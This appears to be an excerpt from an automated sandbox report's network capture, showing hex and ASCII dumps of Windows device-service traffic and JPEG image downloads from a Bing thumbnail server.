                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 78 71 6f 47 6e 47 4f 45 41 55 6d 43 32 67 64 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 65 30 37 66 65 30 35 64 63 63 36 32 36 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: xqoGnGOEAUmC2gd/.2Context: 7fe07fe05dcc6265<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 78 71 6f 47 6e 47 4f 45 41 55 6d 43 32 67 64 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 65 30 37 66 65 30 35 64 63 63 36 32 36 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: xqoGnGOEAUmC2gd/.3Context: 7fe07fe05dcc6265
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:24 UTC58INData Raw: 4d 53 2d 43 56 3a 20 46 53 76 72 7a 59 70 7a 75 6b 61 71 30 35 6f 51 39 42 66 75 49 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: FSvrzYpzukaq05oQ9BfuIQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            13192.168.2.649753150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:25 UTC346OUTGET /th?id=OADD2.10239381876013_1OYVEM6EQRGLI15B8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:25 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 521585
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: CC6A939809F84BB9B7BCD391D47BB0BD Ref B: EWR30EDGE0909 Ref C: 2024-12-27T06:09:25Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:25 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:25 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 f0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 33 3a 33 35 3a 30 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                            Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 13:35:058
                                                                                                                                                                                                                                                                            2024-12-27 06:09:25 UTC16384INData Raw: 18 a5 a2 84 d0 72 a1 31 f3 62 8c 52 d2 e2 82 79 46 e2 91 79 a7 37 14 50 1c a1 cd 14 52 e2 80 e5 11 85 18 5a 29 71 4e e4 88 c3 14 8d e9 4e c5 18 a2 e0 37 14 62 9d 8a 31 45 c0 6e 3e 6c 50 c2 9d b7 bd 18 a2 e0 35 46 7a d1 8a 76 dc d1 8a 60 25 14 b8 a3 14 00 dd bf 2e da 31 8a 76 29 79 a2 e8 06 60 1e 28 55 f9 69 d8 a3 14 5d 00 98 6a 46 5c d3 b1 46 28 0d c6 b0 c2 d2 7f 0d 3f 68 a5 c6 28 26 c8 8d 57 34 bb 69 f4 98 a0 76 43 71 46 3d 69 eb c5 0d 40 c6 71 46 df 4a 76 29 57 8a 04 86 2a f6 a3 02 a4 c5 18 14 07 2a 23 db 46 29 f8 5a 31 e9 4e e1 6d 6e 33 14 95 2a 8c d2 2a 8d d4 5c 1a ec 31 73 b6 97 6d 3f 18 5a 31 45 c1 24 32 91 46 2a 4d b4 6d a2 e2 e5 43 36 e6 8c 62 9e a2 8c 52 1d 86 28 c7 5a 1b 9a 7e 33 46 31 4e e2 e5 19 b4 f5 a3 e6 a7 e0 d0 a1 ba d1 70 49 0d da 69 3a
                                                                                                                                                                                                                                                                            Data Ascii: r1bRyFy7PRZ)qNN7b1En>lP5Fzv`%.1v)y`(Ui]jF\F(?h(&W4ivCqF=i@qFJv)W**#F)Z1Nmn3**\1sm?Z1E$2F*MmC6bR(Z~3F1NpIi:
                                                                                                                                                                                                                                                                            2024-12-27 06:09:25 UTC16384INData Raw: d7 41 ee 26 26 a3 12 ff 00 b5 5c 56 a5 f1 7f c2 4b e6 c1 a5 dc ff 00 69 5c 45 17 98 b1 c7 95 46 c8 c8 1b 8d 71 52 7c 51 f1 e6 a9 24 17 1a 3a f8 76 da 2f 98 4b 1c 92 6f 65 e3 8d d9 39 e3 da b9 6a 63 a8 52 7e fc ac 5a a3 27 b2 3d ab 12 95 cf cd 8a 8a fa 74 b3 b1 7b cb c9 56 2b 78 97 7c 8f 27 ca aa 05 7c d5 e2 0d 7b e2 af 88 fc 41 35 9c 9a 9f d9 5a 2c fc b1 dc 8b 78 7d 3e 5c 75 cd 73 7e 22 b3 f1 ec 76 f0 59 6a 77 d7 73 c3 b7 f7 70 7d af 7a af 6e 99 ce 29 2c 7e 1d c9 45 4d 5f d4 97 4e a4 75 71 76 3d 73 c5 1f b4 17 87 ec 59 93 4a d3 ee 6f 8e ec 79 92 30 8d 3f c6 bc df c6 9f 14 b5 dd 71 a4 7b cb 96 fb 1d ca 94 8e d2 da 70 8b 18 3f de c7 3f 8d 73 5f f0 84 6b 72 68 6b ac 5a 41 05 f4 6f 21 dd 14 0d be 45 0b df 6f f4 ae 69 ee 44 53 30 92 09 14 ab 7c df bb da cb ed
                                                                                                                                                                                                                                                                            Data Ascii: A&&\VKi\EFqR|Q$:v/Koe9jcR~Z'=t{V+x|'|{A5Z,x}>\us~"vYjwsp}zn),~EM_Nuqv=sYJoy0?q{p??s_krhkZAo!EoiDS0|
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: cb 91 67 8f 1e 5c 91 87 4c 1f 43 eb 5c 95 89 89 a6 51 04 8c c5 9b 1e 5b 2d 77 6f a1 69 87 c3 7f 6b b7 bc 92 3d 42 25 f3 27 b6 b9 c2 2e c0 3b 0e b9 ae 19 d3 a1 86 8a a7 6d 1f e6 74 c6 55 2a cb 7d 51 a3 e0 96 96 7d 41 ae e4 f3 ed 8a a9 45 92 29 ca b6 7f ba 3d 45 4f a1 eb 72 6b 3a d4 f6 fa 8a db 29 8e 3d 91 ad ec 86 37 e3 ae 1f 9d a7 eb 5e 75 0d fc 8b 0b 20 95 97 e6 ca b2 fd e5 ed 8a ae b7 3e 6b 34 67 73 48 cd f7 99 b7 56 52 cb 7d ab 94 a4 f7 db c8 e9 8e 23 95 25 d8 f5 2f 10 6a 76 71 69 f2 e8 56 0c ab f6 98 cf 99 e6 49 1b f5 1c 62 4c e3 83 5c ff 00 87 f4 eb 2d 33 45 bc 41 3a ff 00 6c 6e fd e4 53 b4 6f 0c 91 9f ee b7 55 61 ea 0d 5f f0 96 83 e1 39 ad e2 83 50 d5 64 92 e2 58 c9 59 2d 9b e5 8c fa 15 23 ad 3a fb c2 03 52 f1 33 5b 7f c2 51 a7 c4 b1 ed 86 26 f2 8f
                                                                                                                                                                                                                                                                            Data Ascii: g\LC\Q[-woik=B%'.;mtU*}Q}AE)=EOrk:)=7^u >k4gsHVR}#%/jvqiVIbL\-3EA:lnSoUa_9PdXY-#:R3[Q&
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: 1f 5a ec ad 99 46 52 8a 9c 2d de df e4 73 ac 0b 8a 6d 4a eb a1 81 61 f1 2a ca ee 35 b7 d6 e2 5d 4a e2 35 fd c5 ec 7f 24 ca 71 8c 12 78 60 2b 6f c4 97 fa 3e b1 a3 d8 e9 f7 ba 65 f2 f9 4a 5e 28 a3 b9 0a f2 0c 7d e5 23 70 22 b9 0d 5b c3 9e 0b 4b c5 bd b7 d2 b5 4b 5b 4d bf 33 5b 4f e6 05 7f 74 23 2b f9 d7 3d ad 6b 1a 5d ae b4 c7 47 69 e0 6d c3 cb 66 f9 3e bc 76 ad 28 65 d8 6a 95 55 5c 32 71 92 d7 d3 f1 31 9e 22 ad 28 38 d5 b3 47 a4 69 5e 10 f0 1d dc 9e 6d b5 cd cd b5 e5 b6 1e 7b 2d 43 0e ac 0f b2 e3 8f 71 5a 9a 6e 87 e0 eb fb a9 6d ac bc 35 69 a8 d8 41 c7 9f 69 21 86 45 3d f9 2d 87 ae 73 e1 ee a1 f6 d6 fe df 9f 4a 9e e6 6b 66 f2 e4 b9 89 83 fc 9d fe 4f 6a f4 6f 0c eb 3a 45 cc 8c f6 9a 64 12 db 48 d8 91 a0 5d 8c c7 fb c1 31 90 45 79 59 96 27 1d 4e 4d 73 c9 b5
                                                                                                                                                                                                                                                                            Data Ascii: ZFR-smJa*5]J5$qx`+o>eJ^(}#p"[KK[M3[Ot#+=k]Gimf>v(ejU\2q1"(8Gi^m{-CqZnm5iAi!E=-sJkfOjo:EdH]1EyY'NMs
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: 5d ed 6d 1d c4 91 ec 66 55 0b e6 01 d8 e3 bd 3b e2 a4 3e 1b 9a f2 5d 67 c3 71 49 07 99 3f ef e0 6c 79 6a 4f fc f3 c7 dd 1e d5 91 a5 dc 5a 5a 34 7a 84 8b 3b 33 37 cb d3 e5 3e d5 d4 aa 2c 45 05 55 45 a7 db a9 9c 13 83 b3 67 61 6d ab 6b 3a 16 bd 67 1c bb a2 85 64 f3 be c9 0e 36 fa 16 3d 7a 8a 67 c6 0d 13 fb 53 41 97 c6 96 d1 49 1a bc a2 39 62 e1 93 cb e8 8c bf dd e7 82 2b ac f0 96 8f a3 6a fe 17 92 3b 06 8e 5b 89 f0 f1 49 76 df 3c 27 3c a1 61 fc 27 b1 ae 1f c7 fe 22 92 cb 4f d5 7c 13 2c 13 da b4 77 df 2a ab 6f 5f 28 8c 94 cf d7 04 57 81 85 a8 eb 63 53 a2 ad 38 bb 4b d0 ea a8 93 a7 ae cf f3 38 39 23 7b 7d 25 77 aa e5 db 31 ed 6c f4 ed 52 ef 92 68 e2 76 db 98 d7 e5 ad 18 f4 89 21 92 08 ae 2f ad 3e cf 73 c2 ce bf 36 dc fa 8e bc 56 e5 87 c3 6b fb bb eb ab 4d 3b
                                                                                                                                                                                                                                                                            Data Ascii: ]mfU;>]gqI?lyjOZZ4z;37>,EUEgamk:gd6=zgSAI9b+j;[Iv<'<a'"O|,w*o_(WcS8K89#{}%w1lRhv!/>s6VkM;
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: ee d2 0b 69 6c 63 88 cf 3c 4a 11 6e 30 30 54 95 18 65 f7 3d 2b 86 f1 3f 89 f4 3d 6e 48 e5 b6 d4 34 d9 2d f4 df dd db 4f 73 39 8e e2 4e 9c 12 38 60 1b a1 e9 5d d5 f0 b4 f3 7c 42 9a 8b b4 74 7f a1 77 74 e3 76 ce 9b e2 3f 86 2c bf e1 5b cb a8 78 6d a1 b5 be d3 e4 fb 4d cb 45 c3 4d 13 1e 41 03 83 d7 23 da b9 cf 85 3a a5 94 b7 9a 4c f6 fa bb 46 b0 5c b7 ee db e5 65 79 07 cc 37 77 52 dd 8f 4a d0 b6 f1 41 b5 d0 ee ac 9f ec da f5 cc 91 a9 9e 2d c8 a1 90 fd d2 1c 71 f2 f5 c6 33 55 b4 5f 07 5b 6b 77 0d 66 bf 66 d3 ec e3 63 34 b3 d9 67 ed 12 1c 7f 75 b2 38 3d c5 7a 18 5a 0e 9e 0a a6 1b 17 27 cb 77 67 be ff 00 89 74 f0 b5 ab 47 da 53 8d ec 7a 67 c4 0d 6a e7 4c d0 67 bd 17 2b 1d ca e2 1b 19 e3 93 6f ef d8 8c 06 1d 36 8f e5 5e 71 e3 f1 e2 3d 72 f2 2b 6f 14 f8 56 d2 48
                                                                                                                                                                                                                                                                            Data Ascii: ilc<Jn00Te=+?=nH4-Os9N8`]|Btwtv?,[xmMEMA#:LF\ey7wRJA-q3U_[kwffc4gu8=zZ'wgtGSzgjLg+o6^q=r+oVH
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16067INData Raw: 5f 5b c5 91 6d 3c aa 88 9e ea ac fd 71 e9 5e a7 f0 af e1 cd bf 85 6d db 5f f1 66 95 69 15 c3 33 22 c1 77 26 f4 e3 8e 53 a6 33 dc 66 ab 68 97 3a ce 9b e1 9b 1f 0d 78 7e d9 a5 b3 96 2c ad eb 47 24 6d 66 ec 7e 6c 81 c3 64 f7 cd 6d eb df 05 35 3d 4b c0 71 bd af 89 6f a7 d7 15 8b ac 13 b1 48 70 df c2 37 64 af d6 bf 34 cd b3 ee 7a 9e c2 bd 75 4a 9c 9d 95 ae e5 6f 3e c7 bd 83 c3 45 da 7c bc d2 fc 0f 15 f8 d1 36 9f ff 00 09 d5 d4 fe 1a b3 8f 4f 8f ee 34 56 4d be 36 3d c8 3e f5 af f0 13 e1 3e 9f e3 38 e7 bb d6 f5 a8 ac 63 8d b6 2c 6a a5 df 27 90 5b a0 03 f1 ae 4b c4 11 ea 3a 1e bd 2e 97 72 cc b7 7a 7c e6 39 23 e1 95 5d 4f af 7a ec fc 2f e3 8d 5e 2d 53 66 97 05 b4 9a 85 e2 aa 79 8d 1f 96 d9 fc f6 9f c6 be a7 30 58 ba 79 64 69 e0 2a 59 d9 7b cf b7 fc 31 c0 dc 65 89
                                                                                                                                                                                                                                                                            Data Ascii: _[m<q^m_fi3"w&S3fh:x~,G$mf~ldm5=KqoHp7d4zuJo>E|6O4VM6=>>8c,j'[K:.rz|9#]Oz/^-Sfy0Xydi*Y{1e
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: 9e b1 67 68 6f e1 e6 ae 49 19 6e 4f fc 05 a8 f2 b7 37 1f 2d 5b 82 b6 86 69 b4 f5 65 5c 61 b9 fe 2f ee d0 a0 6e e1 ff 00 ef aa b9 e5 00 d9 3d 69 cd 18 dd 92 bf 77 ef 54 f2 2b 04 a5 3b ef a1 57 cb ec 69 fe 5a 1f f6 aa cb 26 7a 2a d1 1c 61 59 49 5a 8f 66 cd 15 55 b1 5d 13 3f ec ed a1 a2 01 7e ef 3d 6a d6 c2 78 45 f7 5a 77 97 9e 07 5a 87 0d 0d 14 db d8 a5 1a 61 54 ba f1 52 3c 63 6e 7e f0 ab 0b 18 0b c7 ff 00 65 42 21 e9 fc 4d 49 41 83 a8 96 8c a8 b1 ed 56 25 77 53 d5 08 dc 6a cb 0c 74 5a 16 3c b7 dd aa e5 22 32 44 0a 32 d4 f5 54 2b ec b5 3a 44 4b 62 85 42 77 52 f6 77 65 4a a5 95 88 90 0d ad 4d 48 80 5c 15 f7 f9 6a ca a0 2d 8d b4 e0 98 55 f9 6a a3 13 3e 6b a4 41 1c 64 af fe cb 53 2a 80 b8 14 e6 43 bb 23 76 2a 54 8c 15 a3 91 0d 54 b9 12 c7 f3 7f bb fc 54 e5 53
                                                                                                                                                                                                                                                                            Data Ascii: ghoInO7-[ie\a/n=iwT+;WiZ&z*aYIZfU]?~=jxEZwZaTR<cn~eB!MIAV%wSjtZ<"2D2T+:DKbBwRweJMH\j-Uj>kAdS*C#v*TTTS
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: 19 57 a8 6e 7f bb 47 33 4c d1 a4 ca 6d 19 11 f2 df f7 cd 2b ab 85 5f bd 9a 9a 4c 6e c6 e5 ff 00 6a 98 ce e1 b9 56 ff 00 65 a9 5a e5 73 a5 a3 21 c4 89 b7 1f 7a 9b e6 4e 37 63 77 fb d5 33 c8 e7 f7 81 77 7f 76 9a e4 ed dd f7 8b 53 25 ea c6 b4 b2 98 f0 1b 76 e5 fe ed 54 b8 9a 6f ee d5 9e 4a e1 29 b3 07 30 ec 45 e7 fb d4 21 4a 37 57 44 0e 65 2c b2 7d ea 6a 3a 08 f2 fd 7f a5 4c cb 9e 0f f0 d4 6b 11 dd 82 b4 d4 6e 8a 94 da 77 b0 d7 c4 91 f0 bb 82 d3 76 00 bc ff 00 c0 be 6a 95 55 17 70 fb a3 fd 9a 46 f2 96 35 1f 78 ff 00 4a 2d 62 d4 95 af d4 81 5f f8 77 71 48 81 0b 64 37 1b be 6d d4 e9 19 0a fc 9f 29 5a 8f 6f ee f2 3e 51 fe d5 27 12 65 5b 64 f5 1e a3 67 ca 3e 62 d4 ab 01 6d df 37 fc 06 91 70 9b 71 52 c6 51 79 2b cd 49 ac 39 5e fb 11 e0 ab 7d cf bb fc 34 83 9d c0
                                                                                                                                                                                                                                                                            Data Ascii: WnG3Lm+_LnjVeZs!zN7cw3wvS%vToJ)0E!J7WDe,}j:LknwvjUpF5xJ-b_wqHd7m)Zo>Q'e[dg>bm7pqRQy+I9^}4


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            14192.168.2.649757150.171.27.10443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC375OUTGET /th?id=OADD2.10239381876014_1KDTTK12P9PNFN49Z&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                            Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                            Content-Length: 577100
                                                                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                            NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 5A6A5E0C32DE49A1835627048CE7B764 Ref B: EWR30EDGE0317 Ref C: 2024-12-27T06:09:26Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:26 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a a4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 31 33 3a 33 34 3a 31 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                            Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 13:34:168
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: bb 29 0e c5 5d 94 6c ab 5e 5d 1e 5e 28 0b 15 b6 52 ac 46 ac ec a5 54 a2 e3 2a f9 54 ab 1d 59 d9 43 25 4d d8 15 bc ba 5f 2e ac 6c a3 6d 17 63 b1 5f cb a5 d8 2a 7d b4 6c a0 2c 40 a9 4b b2 a7 db 46 cc d0 32 15 4a 4d 95 65 63 a5 68 e8 0b 15 76 52 ec ab 3e 5d 1e 5d 03 b1 5f 65 1b 2a ce c1 42 c7 40 58 ad b0 d2 f9 75 67 65 2e ca 40 56 f2 e8 f2 ea ce ca 36 52 19 5b cb a5 54 ab 3b 28 54 a7 70 2b ec a3 6d 59 f2 ff 00 d9 a3 65 20 2b 79 74 bb 2a c7 97 4b e5 d0 3b 15 b6 51 b2 ac f9 74 be 5d 03 2a ec a5 d9 56 bc ba 3c ba 57 15 ca be 5d 2e ca b3 b2 95 63 a2 e1 72 ae ca 5d 82 ac f9 74 79 74 5c 2e 56 d9 4b b2 ac f9 74 79 74 84 56 d9 46 ca b3 b2 97 cb a0 0a db 3d 28 d9 56 76 51 b2 81 d8 ad b2 97 65 58 f2 e9 7c ba 02 c5 6d 94 6c ab 3b 28 d9 fe cd 03 2b ec a3 65 59 f2 e8 f2
                                                                                                                                                                                                                                                                            Data Ascii: )]l^]^(RFT*TYC%M_.lmc_*}l,@KF2JMechvR>]]_e*B@Xuge.@V6R[T;(Tp+mYe +yt*K;Qt]*V<W].cr]tyt\.VKtytVF=(VvQeX|ml;(+eY
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: d2 a8 7a f2 5f 18 7c 6e b7 b6 b1 8b fb 13 4c dd 34 ab e6 34 97 7f 71 47 a0 0a 72 5a b7 fe 19 fc 4d b0 f1 14 cb a7 ea 6b 1d 8d f2 c4 0b 33 48 15 18 fa 73 d0 fb 55 46 ac 1b 56 0b 49 6e 77 b8 6a 17 35 c2 eb df 15 bc 3f 63 ad 36 9f 67 bb 50 0b 1f fa f8 9b f7 6b 26 71 b0 9c 76 ee 45 75 16 ba a5 e9 f0 eb 6a 12 e9 ea d3 6d 1e 5c 16 d3 ef 59 89 f4 62 38 fc 69 f3 c1 cb 97 a8 f5 4a fd 0d 3c 1a 55 15 4f 4b d4 04 da 4a dd de c4 b6 27 6e 64 8e 59 03 6d fc 45 59 d3 ee ad 2f ad fc fb 2b 98 ee 62 dd 8d f1 30 65 c8 f7 14 68 c4 4b 86 a3 9d d4 8d 2c 49 24 71 49 2a ac 92 7f ab 56 6f 99 be 95 17 db ec 03 63 ed 90 67 70 4f f5 a3 a9 e8 28 7c a8 35 65 8d a7 ad 2e d3 4c b5 b9 b6 ba f3 1a de 78 e5 11 b6 c9 3c b6 0d b4 fa 1c 77 a9 c2 91 c5 2b 68 3b b2 3c 1a 76 09 a7 6d f9 77 53 b1
                                                                                                                                                                                                                                                                            Data Ascii: z_|nL44qGrZMk3HsUFVInwj5?c6gPk&qvEujm\Yb8iJ<UOKJ'ndYmEY/+b0ehK,I$qI*VocgpO(|5e.Lx<w+h;<vmwS
                                                                                                                                                                                                                                                                            2024-12-27 06:09:26 UTC16384INData Raw: a7 a5 7a d2 ad 17 4e 32 94 6c 9a 5f 79 ca b9 94 da 8b 30 74 b8 ee 26 8e 38 1e 76 68 a4 90 6e 8d 18 96 fc 3d 6b b3 b3 9a 4f 08 de 4b 03 c5 73 35 8c f0 7f ad 55 75 65 0c 3b f6 dc 0f 51 d2 b9 fb 6b 9d 0b 4e d4 a4 82 28 9a 7b 75 91 4e e6 62 b2 28 fe 35 cf 1d fd aa cd be ab 7f a9 5a de 43 6c de 45 87 96 44 92 32 96 da 85 fe 40 d8 ef db 34 eb 41 d5 b5 d7 ba f7 be 9f d3 14 5f 2e ef 51 9e 20 bd d5 4e 83 05 94 9f 35 8c 99 78 db 68 5d dc ff 00 1e de f9 f5 ac cd 2e e7 ca 6d 9e 52 e7 6f cd f2 ee dd 56 e4 78 d6 cd 50 de 79 a2 4e 19 7f bb f4 cd 53 7b 4f 2f 74 96 f3 f9 b1 7f df 2d 5d 54 e1 14 b9 6c 65 29 26 cb d7 10 c7 24 8b 3c 16 cd 89 db e6 55 f9 9b 3f ec e2 99 e5 dc ea 31 c9 0d 86 99 e6 18 97 e6 db 8d ec 07 51 57 b4 78 2d a3 f0 fc b7 89 a8 79 7a 84 52 29 8e 0f f9 e8
                                                                                                                                                                                                                                                                            Data Ascii: zN2l_y0t&8vhn=kOKs5Uue;QkN({uNb(5ZClED2@4A_.Q N5xh].mRoVxPyNS{O/t-]Tle)&$<U?1QWx-yzR)
